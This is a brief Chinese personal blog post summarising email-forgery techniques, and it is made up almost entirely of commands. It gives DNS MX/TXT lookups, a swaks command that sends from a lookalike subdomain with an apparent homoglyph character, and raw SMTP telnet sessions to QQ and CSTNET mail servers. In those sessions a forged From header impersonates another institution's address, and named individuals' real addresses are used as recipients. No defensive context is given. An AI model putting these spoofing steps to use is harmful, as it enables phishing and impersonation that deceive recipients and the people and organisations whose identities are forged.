姜鹏辉的个人博客 GreyNius

伪造邮件发送技巧总结

2021-04-08

查询

nslookup -q=mx mesalab.cn
nslookup -q=txt mesalab.cn

发送

来自构造的子域名

swaks --to jiangph1001@163.com --from admin@qq.mesаlab.cn --body "warning" --header "Subject: Warning"

发送至qq的伪造邮件

telnet mx3.qq.com 25
ehlo imapmax.xyz
MAIL FROM:<admin@imapmax.xyz>
RCPT TO:<hetao_zj@foxmail.com>

DATA
From:hezhengjie@iie.ac.cn
To: hetao_zj@foxmail.com
Subject: Warning

Fake 666
.

QUIT

发送至cstnet

telnet mx.cstnet.cn 25
MAIL FROM:<test@imapmax.xyz>
RCPT TO:<jiangpenghui@mesalab.cn>

DATA


To: jiangpenghui@mesalab.cn
From: test@imapmax.xyz
Subject: Warning

Warning Message
.

发送至163

参考:


Comments

Content